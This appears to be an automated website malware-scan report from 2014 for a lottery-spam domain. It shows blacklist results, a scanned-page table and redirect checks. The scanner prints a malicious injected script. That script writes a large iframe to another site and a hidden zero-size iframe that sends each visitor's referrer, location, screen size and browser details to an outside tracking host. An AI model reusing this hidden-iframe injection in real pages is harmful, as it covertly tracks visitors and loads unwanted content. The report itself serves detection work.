Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pm2e.mg.58.cm
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pm2e.mg.58.cm/
Result: The website is marked by Yandex as SMS-fraud resource. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as SMS-fraud resource. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://pm2e.mg.58.cm/ | 200 OK Content-Length: 14335 Content-Type: text/html | clean |
http://js.129uu.com/head.js | 200 OK Content-Length: 1859 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.writeln("<div align=\"center\" style=\"background-color:#FFFFFF;width:100%;\" >");
document.writeln("<iframe src=http://www.61172.com/?do=top MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 frameborder=0 height=2800 width=100%></iframe>"); document.writeln("<\/div>"); function y_gVal(iz) {var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);} yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent); document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count31.51yes.com/sa.htm?id=317142788'+yesdata+' height=0 width=0></iframe>'); Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://count31.51yes.com/sa.htm?id=317142788 <iframe marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no src=http://count31.51yes.com/sa.htm?id=317142788'+yesdata+' height=0 width=0> | ||
http://pm2e.mg.58.cm/a-1592-1.html | 200 OK Content-Length: 14354 Content-Type: text/html | clean |
http://pm2e.mg.58.cm/post/?tag=%E5%85%AD%E5%90%88%E5%BD%A9%E5%A4%A9%E7%BA%BF%E5%AE%9D%E5%AE%9D%E7%AC%AC%E4%B8%89%E5%85%AB%E6%9C%9F%2C%E4%B8%80%E8%BA%AB%E6%98%AF%E5%AE%9D%E7%9A%84%E7%94%9F%E8%82%96%E6%98%AF%E4%BB%80%E4%B9%88%2C%E9%A6%99%E6%B8%AF%E5%85%AD%E5%90%88%E5%BD%A9003%E6%9C%9F%E4%B8%A4%E8%82%96%E4%B8%AD%E7%89%B9%E7%8C%B4-%E9%B8%A1 | 200 OK Content-Length: 15934 Content-Type: text/html | clean |
http://pm2e.mg.58.cm/a-188-1.html | 200 OK Content-Length: 4961 Content-Type: text/html | clean |
http://pm2e.mg.58.cm/post/?tag=%E7%99%BD%E5%B0%8F%E5%A7%90%E6%9C%80%E5%87%86%E5%A3%B9%E7%A0%81%2C%E9%A6%99%E6%B8%AF%E5%85%AD%E5%90%88%E5%BD%A92010%E5%B9%B4111%E6%9C%9F%E5%BC%80%E5%A5%96%E7%BB%93%E6%9E%9C%2C%E8%B1%AA%E5%AE%A2%E6%BA%90%E9%A6%99%E6%B8%AF%E5%85%8D%E8%B4%B9%E5%9B%BE%E5%8C%BA | 200 OK Content-Length: 15088 Content-Type: text/html | clean |
http://pm2e.mg.58.cm/a-594-1.html | 200 OK Content-Length: 15705 Content-Type: text/html | clean |
http://pm2e.mg.58.cm/post/?tag=%E9%A6%99%E6%B8%AF%E5%85%AD%E5%90%88%E5%BD%A9083%E9%A2%84%E6%B5%8B%2C%E9%A6%99%E6%B8%AF%E5%85%AD%E5%90%88%E5%BD%A9%E6%9C%80%E6%96%B0%E9%87%91%E6%9C%A8%E6%B0%B4%E7%81%AB%E5%9C%9F%E6%98%AF%E4%BB%80%E4%B9%88%2C%E5%A4%A9%E7%BA%BF%E5%AE%9D%E5%AE%9D%E7%94%9F%E6%B4%BB%E5%B9%BD%E9%BB%98%E5%85%A8%E5%B9%B4%E8%AE%B0%E5%BD%95 | 200 OK Content-Length: 14105 Content-Type: text/html | clean |
http://pm2e.mg.58.cm/a-334-1.html | 200 OK Content-Length: 17944 Content-Type: text/html | clean |
http://pm2e.mg.58.cm/post/?tag=%E9%A3%9E%E8%BD%AE%E6%B5%B7%E7%82%8E%E4%BA%9A%E7%BA%B6%E7%94%9F%E6%97%A5%E9%9F%B3%E4%B9%90%E4%BC%9A2010%2C11%2C2019%2C30THE%2CWALL%E7%A5%A8%E5%B7%B2%E5%94%AE%E5%AE%8C%2C%E9%A6%99%E6%B8%AF%E8%B5%9B%E9%A9%AC%E4%BC%9A025%E6%9C%9F%E4%B8%A4%E8%82%96%E4%B8%AD%E7%89%B9%3A%E9%B8%A1-%E7%8C%AA%2C%E9%A6%99%E6%B8%AF%E5%85%AD%E5%90%88%E5%BD%A9%E5%BC%80%E5%A5%96%E8%AE%B0%E5%BD%952003%E5%B9%B4%E7%AC%AC101%E6%9C%9F | 200 OK Content-Length: 17047 Content-Type: text/html | clean |
http://pm2e.mg.58.cm/a-1689-1.html | 200 OK Content-Length: 15864 Content-Type: text/html | clean |
http://pm2e.mg.58.cm/post/?tag=%E5%85%AD%E5%90%88%E5%BD%A9048%E6%9C%9F%E7%99%BD%E5%B0%8F%E5%A7%90%E6%9D%80%E8%82%96%2C%E5%B2%81%E7%9A%84%E4%B8%AB%E5%A4%B4%E5%8F%AA%E8%83%BD%E7%8E%A9%E4%B8%8D%E8%83%BD%E6%97%A5%2C%E9%A6%99%E6%B8%AF%E5%85%AD%E5%90%88%E5%BD%A9086%E6%9C%9F%E4%B8%A4%E8%82%96%E4%B8%AD%E7%89%B9%3A%E9%B8%A1-%E7%8B%97 | 200 OK Content-Length: 16789 Content-Type: text/html | clean |
http://pm2e.mg.58.cm/a-1169-1.html | 200 OK Content-Length: 14908 Content-Type: text/html | clean |
http://pm2e.mg.58.cm/post/?tag=%E9%A6%96%E6%BC%94-%E5%8D%B0%E5%B0%8F%E5%A4%A9%E5%BC%BA%E5%90%BB%E8%92%8B%E5%B0%8F%E6%B6%B5%2C%E6%9E%97%E4%BE%9D%E6%99%A8%E4%BA%BA%E4%BD%93%E8%89%BA%E6%9C%AF%2C%E5%B0%91%E5%84%BF%E5%8A%A8%E7%89%A9%E8%B0%9C%E8%AF%AD | 200 OK Content-Length: 14947 Content-Type: text/html | clean |
http://pm2e.mg.58.cm/a-1094-2.html | 200 OK Content-Length: 14114 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pm2e.mg.58.cm
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 22 Jul 2014 18:36:21 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.3.14
GET / HTTP/1.1
Host: pm2e.mg.58.cm
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 22 Jul 2014 18:36:21 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.3.14
Second query (visit from search engine):
GET / HTTP/1.1
Host: pm2e.mg.58.cm
Referer: http://www.google.com/search?q=pm2e.mg.58.cm
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: pm2e.mg.58.cm
Referer: http://www.google.com/search?q=pm2e.mg.58.cm
Result:
The result is similar to the first query. There are no suspicious redirects found.